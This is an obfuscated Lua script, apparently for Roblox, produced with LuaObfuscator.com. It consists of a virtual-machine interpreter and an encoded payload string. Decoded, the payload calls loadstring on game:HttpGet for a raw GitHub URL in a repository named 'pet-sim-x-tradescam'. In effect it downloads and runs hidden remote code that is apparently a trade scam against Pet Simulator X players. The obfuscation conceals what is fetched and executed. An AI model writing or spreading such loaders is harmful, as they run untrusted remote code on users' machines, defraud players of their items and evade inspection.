--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v62=0;while true do if (0==v62) then v18=v0(v3(v29,1,1));return "";end end else local v63=0;local v64;while true do if (v63==0) then v64=v2(v0(v29,16));if v18 then local v90=0;local v91;while true do if (0==v90) then v91=v5(v64,v18);v18=nil;v90=1;end if (v90==1) then return v91;end end else return v64;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v65=(v30/((6 -4)^(v31-(1 + 0))))%((3 -1)^(((v32-(1 + 0)) -(v31-(1 + 0))) + 1 + 0));return v65-(v65%((1149 -434) -(25 + 689)));else local v66=(3 -1)^(v31-(2 -1));return (((v30%(v66 + v66))>=v66) and (1 + 0)) or (0 + 0);end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38,v39=v1(v15,v17,v17 + 2);v17=v17 + (4 -2);return (v39 * (151 + 105)) + v38;end local function v22()local v40,v41,v42,v43=v1(v15,v17,v17 + 2 + 1);v17=v17 + (8 -4);return (v43 * (36259009 -19481793)) + (v42 * (52294 + 8939 + 4303)) + (v41 * (181 + 75)) + v40;end local function v23()local v44=v22();local v45=v22();return (( -((2349 -(730 + 155)) -((601 -(67 + 23)) + 951)) * v19(v45,1343 -(909 + (942 -540)))) + (3 -2)) * (2^(v19(v45,(141 -89) -31,9 + 22) -(1218 -(105 + 90)))) * ((((v19(v45,1929 -(482 + 1446),53 -33) * ((395 -(336 + 57))^(23 + 9))) + v44)/((506 -(261 + 243))^(10 + 42))) + 1 + 0);end local function v24(v33)local v46;if  not v33 then v33=v22();if (v33==(0 -0)) then return "";end end v46=v3(v15,v17,(v17 + v33) -(2 -1));v17=v17 + v33;local v47={};for v60=2 -1, #v46 do v47[v60]=v2(v1(v3(v46,v60,v60)));end return v6(v47);end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v48=0 -0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v48~=(227 -(76 + 148))) then else v55=nil;v56=nil;v48=4;end if (v48~=(0 + 0)) then else v49=0 + 0;v50=nil;v48=1083 -(73 + 1009);end if (v48~=(1661 -(1204 + 456))) then else v51=nil;v52=nil;v48=2;end if (v48==(287 -(148 + 135))) then while true do if (v49~=(2 -1)) then else local v87=0 -0;while true do if (v87~=0) then else v52=nil;v53=nil;v87=1208 -(956 + 251);end if ((1 + 0)~=v87) then else v49=1 + 1;break;end end end if (v49==(1833 -(366 + 1467))) then local v88=0 + 0;while true do if (v88~=(1554 -(103 + 1450))) then else v49=1701 -(840 + 860);break;end if (v88~=0) then else v50=1243 -(171 + 1072);v51=nil;v88=151 -(65 + 85);end end end if (v49~=(1 + 2)) then else v56=nil;while true do if (v50~=(454 -(60 + 392))) then else local v94=0 + 0;local v95;while true do if (v94~=(0 + 0)) then else v95=1383 -(440 + 943);while true do if (v95==0) then for v108=2 -1,v55 do local v109=0 -0;local v110;local v111;local v112;local v113;while true do if (v109==(7 -5)) then while true do if (v110~=0) then else v111=0 + 0;v112=nil;v110=1;end if (v110==(3 -2)) then v113=nil;while true do if (v111==(1 -0)) then if (v112==(3 -2)) then v113=v20()~=(0 -0);elseif (v112==(374 -(297 + 75))) then v113=v23();elseif (v112==(8 -5)) then v113=v24();end v56[v108]=v113;break;end if (v111~=0) then else local v149=0 + 0;while true do if (v149==(1 + 0)) then v111=1 + 0;break;end if (v149==(0 -0)) then v112=v20();v113=nil;v149=1 + 0;end end end end break;end end break;end if (v109~=(0 + 0)) then else v110=0 + 0;v111=nil;v109=1 + 0;end if (v109==1) then v112=nil;v113=nil;v109=1731 -(1238 + 491);end end end v54[1 + 2]=v20();v95=1;end if (v95~=1) then else for v114=1938 -(1656 + 281),v22() do local v115=0 + 0;local v116;local v117;while true do if ((3 -2)==v115) then while true do if ((731 -(287 + 444))==v116) then v117=v20();if (v19(v117,3 -2,1 + 0)~=(488 -(128 + 360))) then else local v141=407 -(397 + 10);local v142;local v143;local v144;local v145;local v146;local v147;while true do if (v141==(1571 -(1525 + 44))) then v146=nil;v147=nil;v141=1832 -(336 + 1493);end if (v141~=(1367 -(787 + 580))) then else v142=0;v143=nil;v141=1;end if (v141~=(9 -6)) then else while true do if (v142==(1976 -(254 + 1720))) then v147=nil;while true do if ((1 + 1)==v143) then while true do if (v144~=2) then else local v154=0;local v155;while true do if (v154~=0) then else v155=0 -0;while true do if (v155==(0 + 0)) then local v164=0 + 0;local v165;while true do if (v164~=(265 -(196 + 69))) then else v165=1048 -(376 + 672);while true do if (v165==0) then if (v19(v146,1795 -(1711 + 83),4 -3)~=1) then else v147[2]=v56[v147[1272 -(239 + 1031)]];end if (v19(v146,2 -0,2)~=(1 -0)) then else v147[3 + 0]=v56[v147[3]];end v165=1222 -(326 + 895);end if (v165==(2 -1)) then v155=806 -(548 + 257);break;end end break;end end end if (v155==(4 -3)) then v144=6 -3;break;end end break;end end end if (1==v144) then local v156=0 -0;local v157;local v158;while true do if (v156==1) then while true do if (v157==(0 -0)) then v158=0 + 0;while true do if (v158==0) then v147={v21(),v21(),nil,nil};if (v145==(0 + 0)) then local v167=599 -(598 + 1);local v168;while true do if (v167==(0 -0)) then v168=0 -0;while true do if (v168==(0 + 0)) then v147[7 -4]=v21();v147[4]=v21();break;end end break;end end elseif (v145==(1212 -(800 + 411))) then v147[3]=v22();elseif (v145==(154 -(73 + 79))) then v147[1422 -(590 + 829)]=v22() -((1 + 1)^(35 -(11 + 8)));elseif (v145==(2 + 1)) then local v175=638 -(49 + 589);local v176;local v177;while true do if (0==v175) then v176=0 + 0;v177=nil;v175=154 -(142 + 11);end if (v175==(2 -1)) then while true do if (v176~=0) then else v177=0 -0;while true do if (v177~=(0 + 0)) then else v147[2 + 1]=v22() -((2 + 0)^(590 -(531 + 43)));v147[4]=v21();break;end end break;end end break;end end end v158=3 -2;end if (v158~=1) then else v144=1 + 1;break;end end break;end end break;end if (v156==0) then v157=0 + 0;v158=nil;v156=1;end end end if (v144~=0) then else local v159=0 + 0;local v160;while true do if (v159~=(655 -(320 + 335))) then else v160=0 + 0;while true do if (v160~=(1 -0)) then else v144=1351 -(748 + 602);break;end if (v160~=(0 + 0)) then else local v166=0 -0;while true do if (0~=v166) then else v145=v19(v117,2 -0,3);v146=v19(v117,3 + 1,12 -6);v166=1 + 0;end if (v166~=1) then else v160=1 -0;break;end end end end break;end end end if (v144~=3) then else if (v19(v146,3,5 -2)~=(1 + 0)) then else v147[4]=v56[v147[5 -1]];end v51[v114]=v147;break;end end break;end if (v143==(2 -1)) then local v152=0;while true do if (v152==(0 + 0)) then v146=nil;v147=nil;v152=198 -(86 + 111);end if (v152==1) then v143=2;break;end end end if (v143~=(1092 -(585 + 507))) then else local v153=0 -0;while true do if (v153==(593 -(288 + 305))) then local v162=0 -0;while true do if (v162==0) then v144=0 + 0;v145=nil;v162=969 -(474 + 494);end if ((1 + 0)~=v162) then else v153=3 -2;break;end end end if (v153~=(1372 -(401 + 970))) then else v143=1 + 0;break;end end end end break;end if (v142==1) then v145=nil;v146=nil;v142=4 -2;end if (v142==(1895 -(371 + 1524))) then local v151=0 + 0;while true do if (v151==(0 -0)) then v143=0;v144=nil;v151=1;end if (v151~=1) then else v142=3 -2;break;end end end end break;end if ((418 -(165 + 252))==v141) then v144=nil;v145=nil;v141=2;end end end break;end end break;end if ((0 + 0)~=v115) then else local v129=0 -0;while true do if (v129==0) then v116=1013 -(811 + 202);v117=nil;v129=1;end if ((1082 -(455 + 626))~=v129) then else v115=1 + 0;break;end end end end end v50=3;break;end end break;end end end if (v50==(850 -(33 + 816))) then local v96=0;while true do if (v96~=0) then else v54={v51,v52,nil,v53};v55=v22();v96=446 -(237 + 208);end if (v96==(1 + 0)) then v56={};v50=5 -3;break;end end end if (v50==(0 -0)) then v51={};v52={};v53={};v50=1;end if ((6 -3)~=v50) then else local v97=0 + 0;local v98;while true do if (v97==(1695 -(313 + 1382))) then v98=1764 -(822 + 942);while true do local v101=0 -0;while true do if (v101~=(1086 -(670 + 416))) then else if ((0 + 0)~=v98) then else for v130=3 -2,v22() do v52[v130-(1 + 0)]=v27();end for v132=3 -2,v22() do v53[v132]=v22();end v98=1 + 0;end if (v98==(1 -0)) then return v54;end break;end end end break;end end end end break;end if (v49~=(2 + 0)) then else local v89=0 + 0;while true do if (v89==(1 + 0)) then v49=147 -(43 + 101);break;end if ((305 -(40 + 265))~=v89) then else v54=nil;v55=nil;v89=1 + 0;end end end end break;end if ((2 + 0)~=v48) then else v53=nil;v54=nil;v48=1 + 2;end end end local function v28(v34,v35,v36)local v57=v34[1];local v58=v34[2];local v59=v34[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v11("#",...) -1;local function v71()local v72=v57;local v73=Const;local v74=v58;local v75=v59;local v76=v26;local v77={};local v78={};local v79={};for v84=0,v70 do if (((1567 + 4)<(8410 -5737)) and (v84>=v75)) then v77[v84-v75]=v69[v84 + 1];else v79[v84]=v69[v84 + (3 -2)];end end local v80=(v70-v75) + (3 -2);local v81;local v82;while true do local v85=0;local v86;while true do if (((0 -0)==v85) or ((5864 -2721)<=(1869 -(172 + 205)))) then v86=0 + 0;while true do if ((v86==(0 + 0)) or (318>(10023 -6164))) then local v99=0;local v100;while true do if (((756 + 507)==((4639 -(125 + 1348)) -1903)) and (v99==(0 -0))) then v100=0 + 0;while true do if ((v100==0) or ((3125 -(681 + 28))==717)) then local v118=1904 -(95 + 1809);while true do if (((4085 -(1425 + 525))<(3584 -((1707 -1034) + (1742 -(914 + 479))))) and (v118==(0 + 0))) then v81=v72[v67];v82=v81[2 -1];v118=216 -(165 + 50);end if ((v118==(1 + (0 -0))) or ((1641 + 2867)<=2931)) then v100=1542 -(210 + 1331);break;end end end if (((1338 + 2355)<=(2483 + 1270)) and (v100==(1 + 0))) then v86=3 -2;break;end end break;end end end if ((v86==(1 + 0)) or ((8277 -4798)<(48 + (1167 -834)))) then if (((1143 -757)>=((127 + 1919) -((2214 -(1634 + 111)) + 280 + 971))) and (v82<=(2 + 0))) then if ((v82<=(0 + 0)) or ((3083 -(97 + (4981 -3370)))<=(620 + (1178 -(253 + 721))))) then local v103=0 -0;local v104;local v105;local v106;local v107;while true do if (((5084 -(765 + 783))>=1942) and (v103==(0 + 0))) then local v127=0;while true do if ((v127==(0 + 0)) or ((4724 -(592 + 312))<(1357 -(868 + 60)))) then v104=v81[1 + 1];v105,v106=v76(v79[v104](v12(v79,v104 + ((1293 -(252 + 1038)) -(941 -(603 + 336))),v81[(2492 -978) -(385 + 1126)])));v127=1 + 0;end if ((v127==(1 -0)) or ((2010 + 547)<=(1868 -(150 + 479)))) then v103=602 -(491 + 110);break;end end end if ((v103==(2 -1)) or ((7122 -3730)<=(4362 -(579 + 505)))) then local v128=0 -(860 -(157 + 703));while true do if ((v128==(1787 -(568 + 1218))) or ((3571 -(88 + 521))>(4979 -(521 + 809)))) then v103=1 + 1;break;end if (((2625 -(271 + 500))==1854) and (v128==(0 -0))) then v68=(v106 + v104) -(1 -(0 -0));v107=1827 -(648 + 1179);v128=1 + 0;end end end if (((129 + 35)==164) and (v103==(1 + 1))) then for v134=v104,v68 do local v135=0;local v136;while true do if ((v135==0) or ((4466 -1418)<(2161 -((602 -(70 + 121)) + 138)))) then v136=1432 -(1392 + 40);while true do if ((v136==0) or (1093==(4056 -(252 + 1635)))) then v107=v107 + (1910 -(1395 + 514));v79[v134]=v105[v107];break;end end break;end end end break;end end elseif ((v82==1) or ((5495 -(1093 + 731))<(2372 -708))) then v79[v81[19 -(16 + 1)]]=v81[6 -3];else v79[v81[1 + 1]]();end elseif (((5281 -(149 + 151 + 532))>(3467 -(258 + 117))) and (v82<=4)) then if (((5206 -(55 + 489 + 483))<4414) and (v82>(1 + 2))) then local v120=(1108 + 581) -(1339 + (2025 -(1322 + 353)));local v121;local v122;local v123;while true do if (((3743 -((70 -38) + 735))<(763 + 3151)) and (v120==(606 -(58 + 414 + 134)))) then v121=0 + 0;v122=nil;v120=659 -(25 + 633);end if ((v120==1) or (68>=(10918 -7237))) then v123=nil;while true do if (((1004 + 2487)>(4432 -(891 + 1076))) and (1==v121)) then v79[v122 + (694 -(288 + 405))]=v123;v79[v122]=v123[v81[4 + 0]];break;end if ((2613>=(590 + 1295)) and (v121==(0 + 0))) then local v140=0;while true do if ((((1034 + 3234) -1140)==(3197 -(16 + 53))) and (v140==(1 + 0))) then v121=1 + 0;break;end if ((v140==(0 + 0)) or (((16391 -11520) -(526 + 114))<=(5873 -2930))) then v122=v81[2];v123=v79[v81[3 + 0]];v140=488 -(148 + 202 + 137);end end end end break;end end else do return;end end elseif ((2188<=(3517 -(430 + 53))) and (v82==(1693 -(1275 + 413)))) then v79[v81[2 + 0]]=v36[v81[3]];else local v125=(1027 + 146) -(77 + 65 + 1031);local v126;while true do if ((0==v125) or ((2995 -(3570 -2612))<(248 + 78))) then v126=v81[1 + 1];v79[v126]=v79[v126](v12(v79,v126 + (1370 -(23 + 20 + 1326)),v68));break;end end end v67=v67 + 1 + 0;break;end end break;end end end end A,B=v26(v10(v71));if  not A[1] then local v83=v34[4][v67] or "?";error("Script error at ["   .. v83   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end return v28(v27(),{},v16)();end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F726F626C6F78736372697074736F6E746F702F7065742D73696D2D782D74726164657363616D2F6D61696E2F73637269707400083O0012053O00013O001205000100023O002004000100010003001201000300046O000100034O00065O00022O00023O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
